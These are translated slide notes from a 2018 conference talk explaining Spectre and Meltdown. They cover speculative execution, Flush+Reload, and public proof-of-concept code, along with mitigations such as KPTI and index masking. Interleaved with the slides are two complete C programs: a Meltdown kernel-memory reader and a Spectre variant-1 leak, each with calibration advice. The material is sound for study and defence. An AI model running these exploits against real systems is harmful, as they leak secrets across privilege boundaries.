HITCON FreeTalk 2018 - Spectre & Meltdown: Vulnerability Principles and PoC Analysis

HITCON FreeTalk 2018 - The Historical Baggage of CPU Processors
➠ Talk: Spectre & Meltdown: Vulnerability Principles and PoC Analysis
➠ Speaker: Bletchley
➠ Collaborative notes: https://hackmd.io/IYTgRsAMaQTAtAZhAEwGbwCxlgdniAMaIaGECmAjISoWAKzCbBA=?view
➠ Video: https://www.facebook.com/HITCON/videos/1732117933486188/

Slide 1
Bletchley, 2018.01.19
https://www.youtube.com/watch?v=L1N1P2zxaZE

Slide 2
§ Disclosure date: 2018.01.03
§ Threat
  §  An adversary who can execute low-privilege code can read memory regions it is not permitted to access
§ Impact
  §  Meltdown: most Intel processors
  §  Spectre: Intel, AMD, and ARM processors
§ Root cause
  §  Inconsistency between the processor's architectural state and its microarchitectural state (the cache)
  §  Permission checks are not enforced before the CPU's optimizations (out-of-order and speculative execution) let transient instructions use the data

Slide 3
§ Disclosed by
  §  Meltdown
    §  Jann Horn (Google Project Zero)
    §  Werner Haas, Thomas Prescher (Cyberus Technology)
    §  Daniel Gruss, Moritz Lipp, Stefan Mangard, Michael Schwarz (Graz University of Technology)
  §  Spectre
    §  Jann Horn (Google Project Zero)
    §  Paul Kocher, Daniel Genkin (University of Pennsylvania and University of Maryland), Mike Hamburg (Rambus), Moritz Lipp (Graz University of Technology), and Yuval Yarom (University of Adelaide and Data61)
§ Website
  §  https://meltdownattack.com/

Slide 4
§  CVE-2017-5753 - bounds check bypass (Spectre, variant 1)
§  CVE-2017-5715 - branch target injection (Spectre, variant 2)
§  CVE-2017-5754 - rogue data cache load (Meltdown, variant 3)

Slide 5 (out-of-order pipeline overview)
•  Frontend
  •  Fetch and Decode
•  Execution Engine
  •  Reorder Buffer
  •  Execution Unit

Slide 6
§  Once an instruction's data dependencies are satisfied, it is dispatched to an execution unit
§  To keep the execution units fully utilized, most modern processors use out-of-order execution
  §  An instruction can execute early, even while earlier instructions have not yet finished
§  Normal case
  §  The execution unit computes the result and holds the effect of the instruction in the reorder buffer
  §  Once all earlier instructions have finished, the instruction retires and its result is committed to architectural state
§  If an error (exception) occurs
  §  The execution result is discarded
§  Even though the result is never committed to architectural state, the microarchitectural state has already changed
  §  Cache state

Slide 7
§  Speculative execution is one form of out-of-order execution
§  When a conditional branch's direction depends on earlier instructions whose execution has not completed, the CPU predicts the path the program will follow and speculatively executes instructions along that path
  §  Prediction correct: the instructions retire and their results are committed
  §  Prediction wrong: the execution results are discarded
§  Even though the results are never committed to architectural state, the microarchitectural state has already changed

Slide 8
§  Cache side-channel attacks exploit the timing differences introduced by caches
§  Meltdown and Spectre use microarchitectural side-channel attacks to recover the data left behind in the microarchitecture
§  Known cache side-channel attacks
  §  Evict+Time
  §  Prime+Probe
  §  Flush+Reload

Slide 9
§  Flush+Reload works at single-cache-line granularity
§  It exploits the shared, inclusive last-level cache
§  The attacker repeatedly flushes a targeted memory location with the clflush instruction
§  By measuring how long it takes to reload the data, the attacker determines whether another process loaded it into the cache in the meantime

Slide 10
§  The probe array is attacker-controlled data
§  Access time distinguishes
  §  Hit (fast)
  §  Miss (slow)
§  256 accesses, one per possible value, reveal one byte of data
  §  Figure: Array[61 * cache_line_size] reloads fast, so the leaked byte is 61

Slide 11 (Meltdown)
§  Exploits the out-of-order execution feature of processors
§  Transfers the hidden data out of the cache via a cache side-channel attack

Slide 12
§  The content of an attacker-chosen memory location, which is inaccessible to the attacker, is loaded into a register
§  A transient instruction accesses a cache line based on the secret content of the register
§  The attacker uses Flush+Reload to determine which cache line was accessed and hence the secret stored at the chosen memory location

Slide 13
§  Transient instruction
  §  An instruction that should never execute architecturally
  §  The CPU executes it anyway through out-of-order execution
  §  It changes the microarchitectural state of the processor

Slide 14
§  Line 3 never executes architecturally
§  The CPU stealthily executes line 3 ahead of time
§  The execution result is abandoned
§  But the cache state has already changed

Slide 15
§  A traversal of the probe array records the time needed to access each element
§  The element that reloads fast reveals the data: here the value is 84

Slide 16
§  Meltdown PoC
  §  https://github.com/IAIK/meltdown
  §  Consists of 5 demo programs
    §  A first test that reads another process' memory
    §  Breaking KASLR
    §  Reliability test
    §  Reading physical memory
    §  Dumping memory
  §  Core library: libkdump

Slide 17
§ Gather statistics on the access time of cached vs. non-cached data
§ Calculate the hit/miss threshold from them

Slide 18
§ libkdump_read calls
  §  libkdump_read_tsx()
  §  libkdump_read_signal_handler()
  to read memory
§ Each calls MELTDOWN to trigger the out-of-order access
§ Then invokes flush_reload() to recover the data value from the cache

Slide 19
§  Since the memory addressed by rcx is inaccessible, an exception is raised at line 50
§  Lines 51-53 are nevertheless executed out of order
§  Part of the probe array (rbx) is loaded into the cache, which reveals the value read through rcx

Slide 20
§  Flush+Reload
§  Check whether the value is in the cache
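The Meltdown path the slides walk through (flush the probe array, calibrate a hit/miss threshold, run the faulting load plus dependent probe access under a SIGSEGV handler, then Flush+Reload the probe array), as an added example in C. This is not libkdump's code: the one-page-per-value probe layout, the median-midpoint threshold heuristic and the function names are this example's assumptions, and the transient sequence is only the three instructions the slides describe (no retry-on-zero loop, no TSX suppression). The demo in main() reads a byte from the process's own memory; on a KPTI-patched kernel or an unaffected CPU a kernel address simply yields -1.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#if defined(__x86_64__)
#include <x86intrin.h>
#define HAVE_X86_64 1
#else
#define HAVE_X86_64 0   /* timing and asm parts become no-ops on other ISAs */
#endif

#define PAGE 4096
/* Probe array with one page per byte value (assumed layout): the shl $12 in
 * the transient sequence turns the leaked byte into a page offset. */
static uint8_t probe[256 * PAGE] __attribute__((aligned(PAGE)));

static void flush_line(const void *p) {        /* evict from every cache level */
#if HAVE_X86_64
    _mm_clflush(p);
#else
    (void)p;
#endif
}

static uint64_t reload_time(const volatile uint8_t *p) { /* TSC ticks for one load */
#if HAVE_X86_64
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
#else
    (void)p;
    return 0;
#endif
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Slide 17: from n timings of a warm line and n of a flushed line, choose the
 * hit/miss threshold as the midpoint between the two medians (medians so that a
 * few interrupt-inflated samples do not skew it; this heuristic is the example's
 * choice, not libkdump's formula). Both arrays are sorted in place. */
uint64_t calibrate_threshold(uint64_t *cached, uint64_t *flushed, size_t n) {
    qsort(cached, n, sizeof *cached, cmp_u64);
    qsort(flushed, n, sizeof *flushed, cmp_u64);
    uint64_t hit = cached[n / 2], miss = flushed[n / 2];
    return hit + (miss - hit) / 2;
}

uint64_t measure_threshold(size_t n) {         /* sample both cases on this machine */
    uint64_t *c = malloc(n * sizeof *c), *f = malloc(n * sizeof *f);
    for (size_t i = 0; i < n; i++) {
        (void)*(volatile uint8_t *)probe;      /* warm line */
        c[i] = reload_time(probe);
        flush_line(probe);                     /* cold line */
        f[i] = reload_time(probe);
    }
    uint64_t th = calibrate_threshold(c, f, n);
    free(c); free(f);
    return th;
}

/* Slides 10/15/20: exactly one probe page should reload fast; its index is the
 * leaked byte. Zero or several fast pages is noise and is reported as -1. */
int decode_byte(const uint64_t times[256], uint64_t threshold) {
    int hit = -1;
    for (int i = 0; i < 256; i++)
        if (times[i] < threshold) { if (hit != -1) return -1; hit = i; }
    return hit;
}

static sigjmp_buf after_fault;
static void on_segv(int sig) { (void)sig; siglongjmp(after_fault, 1); }

/* Slides 18-19: one attempt at addr. The load from addr faults, but the shift
 * and the probe load run out of order first; the SIGSEGV handler (exception
 * handling, not suppression) resumes control after the transient sequence. */
int meltdown_read_byte(uintptr_t addr, uint64_t threshold) {
#if HAVE_X86_64
    uint64_t times[256];
    for (int i = 0; i < 256; i++) flush_line(probe + (size_t)i * PAGE);
    signal(SIGSEGV, on_segv);
    if (sigsetjmp(after_fault, 1) == 0)
        __asm__ __volatile__(
            "movzbq (%[a]), %%rax\n\t"            /* faults if addr is unreadable */
            "shl    $12, %%rax\n\t"               /* byte -> page index */
            "movq   (%[p], %%rax, 1), %%rax\n\t"  /* transient touch of probe[byte*PAGE] */
            : : [a] "r"(addr), [p] "r"((uintptr_t)probe) : "rax", "memory");
    signal(SIGSEGV, SIG_DFL);
    for (int i = 0; i < 256; i++) times[i] = reload_time(probe + (size_t)i * PAGE);
    return decode_byte(times, threshold);
#else
    (void)addr; (void)threshold;
    return -1;
#endif
}

int main(void) {
    /* Demo on a byte this process may read anyway (no fault, the sequence just
     * runs). Kernel addresses give -1 on KPTI-patched or unaffected CPUs. */
    static const char sample[] = "T";
    uint64_t th = measure_threshold(1000);
    printf("threshold=%llu ticks, byte=%d\n", (unsigned long long)th,
           meltdown_read_byte((uintptr_t)sample, th));
    return 0;
}
```

Two practical notes. Calibrate on the target, not on a reference machine: rdtscp tick counts for a hit and a miss differ by CPU generation and by whether the process is pinned, and a threshold that is too high turns every noisy sample into a false hit, which decode_byte reports as -1 rather than as a wrong byte. Second, a -1 on a kernel address is itself a quick check that KPTI (or the hardware fix) is active; run this only against memory you own.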
Slide 21
§  Reconstructing a photo with Meltdown
§  https://www.youtube.com/watch?v=L1N1P2zxaZE

Slide 22 (Spectre)
§  Exploits the processor's speculative execution and branch prediction features
§  Recovers the data from the cache via a cache side-channel attack

Slide 23
1.  Mistrain the processor so that it will later make an exploitably erroneous speculative prediction
2.  Speculatively execute instructions that transfer confidential information from the victim context into a microarchitectural side channel
3.  Recover the confidential data from the cache

Slide 24
§  Pretraining
  §  Make the program pass through this bounds check many times with in-bounds values
§  The adversary then chooses a malicious x that indexes data it is not permitted to read, e.g. kernel-space memory
§  Because
  §  array1_size is not in the cache, the CPU is delayed in reading it and cannot resolve the check
  §  The branch predictor believes the check will pass, so it speculatively executes the code inside the branch with the malicious x
§  In the end the execution result is discarded, but its trace remains in the cache
§  As with Meltdown, Flush+Reload recovers the confidential data
(figure labels: No Cache, No Cache, Cache)

Slide 25
§  Spectre PoC
  §  https://github.com/crozone/SpectrePoC
  §  based on Erik August's gist

Slide 26
§  Make 5 training runs for every 1 attack run
§  This mistrains the branch predictor

Slide 27
§  Victim function
  §  When x is larger than array1_size, the code in the branch still executes speculatively
  §  This changes the cache state

Slide 28
§  Measure the time needed to access memory
§  Determine whether it is in the cache
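The Spectre variant 1 procedure of slides 23-28 (train the predictor with in-bounds x, flush array1_size, call the victim with a malicious x, then Flush+Reload the probe array and score the hits), as an added example in C. It is not the SpectrePoC repository's code: array1, array2, the STRIDE and CACHE_HIT_THRESHOLD constants, the secret string and the helper names are this example's assumptions, and the branchless select_x() and the 167/13 probe-order mix are this example's way of realising the 5-train/1-attack schedule the slides describe. The threshold is a placeholder; calibrate it on the target as in the Meltdown section.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#if defined(__x86_64__)
#include <x86intrin.h>
#define HAVE_X86_64 1
#else
#define HAVE_X86_64 0   /* flush and timing compile to no-ops on other ISAs */
#endif

#define CACHE_HIT_THRESHOLD 80   /* TSC ticks; assumed, calibrate on the target */
#define STRIDE 512               /* bytes between probe lines; assumed */

/* Victim-side data, constructed for this example. */
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
uint8_t unused2[64];
uint8_t array2[256 * STRIDE];
const char *secret = "The Magic Words are Squeamish Ossifrage.";
volatile uint8_t temp = 0;   /* sink so the compiler keeps the victim's loads */

/* Victim (slide 27): the bounds check is architecturally correct. If array1_size
 * is not cached the outcome arrives late, and the predictor, trained by the
 * preceding in-bounds calls, lets array1[x] and the dependent array2 line be
 * loaded transiently even for an out-of-bounds x. */
void victim_function(size_t x) {
    if (x < array1_size)
        temp &= array2[array1[x] * STRIDE];
}

/* x for iteration j of the schedule (slide 26): malicious_x when j % 6 == 0,
 * training_x on the other five. Computed without a branch so that the
 * selection itself leaves no pattern in the predictor. */
size_t select_x(unsigned int j, size_t training_x, size_t malicious_x) {
    size_t x = ((size_t)(j % 6) - 1) & ~(size_t)0xFFFF; /* all ones iff j%6==0 */
    x = x | (x >> 16);                                   /* spread to every bit */
    return training_x ^ (x & (malicious_x ^ training_x));
}

/* Probe array2 in a pseudo-random order so the stride prefetcher cannot pull
 * in neighbouring lines and fake a hit (167 is odd, so this is a permutation). */
unsigned int mix_index(unsigned int i) { return (i * 167 + 13) & 255; }

/* Most and second-most frequently cached value; ties go to the later index. */
int best_guess(const int results[256], int *second) {
    int j = -1, k = -1;
    for (int i = 0; i < 256; i++) {
        if (j < 0 || results[i] >= results[j]) { k = j; j = i; }
        else if (k < 0 || results[i] >= results[k]) { k = i; }
    }
    *second = k;
    return j;
}

/* Leak the byte at array1[malicious_x] (an offset from array1, so it may point
 * anywhere in the process) through the cache. Returns -1 if nothing leaked. */
int read_memory_byte(size_t malicious_x, int *score_out) {
    int results[256] = {0};
#if HAVE_X86_64
    size_t training_x = 0;
    for (int tries = 999; tries > 0; tries--) {
        for (int i = 0; i < 256; i++) _mm_clflush(&array2[i * STRIDE]);
        for (unsigned int j = 30; j-- > 0;) {          /* 5 train, 1 attack, x5 */
            _mm_clflush(&array1_size);                 /* make the check slow */
            for (volatile int z = 0; z < 100; z++) {}  /* let the flush land */
            victim_function(select_x(j, training_x, malicious_x));
        }
        for (int i = 0; i < 256; i++) {               /* Flush+Reload (slide 28) */
            unsigned int mix_i = mix_index(i), aux;
            volatile uint8_t *p = &array2[mix_i * STRIDE];
            uint64_t t0 = __rdtscp(&aux);
            (void)*p;
            uint64_t dt = __rdtscp(&aux) - t0;
            if (dt <= CACHE_HIT_THRESHOLD && mix_i != array1[training_x])
                results[mix_i]++;
        }
        int k, j = best_guess(results, &k);
        if (results[j] >= 2 * results[k] + 5 || (results[j] == 2 && results[k] == 0))
            break;                                    /* clear winner: stop early */
    }
#else
    (void)malicious_x;
#endif
    int k, j = best_guess(results, &k);
    *score_out = results[j];
    return results[j] > 0 ? j : -1;
}

int main(void) {
    size_t off = (size_t)(secret - (const char *)array1);  /* secret as array1 offset */
    for (size_t i = 0; i < 8; i++) {
        int score, v = read_memory_byte(off + i, &score);
        printf("0x%02x (%c) score=%d\n", v & 0xff, v > 31 && v < 127 ? v : '?', score);
    }
    return 0;
}
```

The flush of array1_size before every victim call is what opens the speculation window; without it the bounds check resolves before the transient loads issue and the attack degrades to noise. The corresponding fix on the victim side is to make the index independent of prediction, either with a serialising lfence after the check or by masking the index so that an out-of-bounds x can never select an array1 element (the idea behind the Linux kernel's array_index_nospec()).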
Slides 29-30: image only (no text)

Slide 31
§  handling, we catch the exception effectively occurring after executing the transient instruction sequence, and with exception suppression, we prevent the exception from occurring at all and instead redirect the control flow after executing the transient instruction sequence

Slide 32
§  The Branch Target Buffer (BTB) keeps a mapping from the addresses of recently executed branch instructions to their destination addresses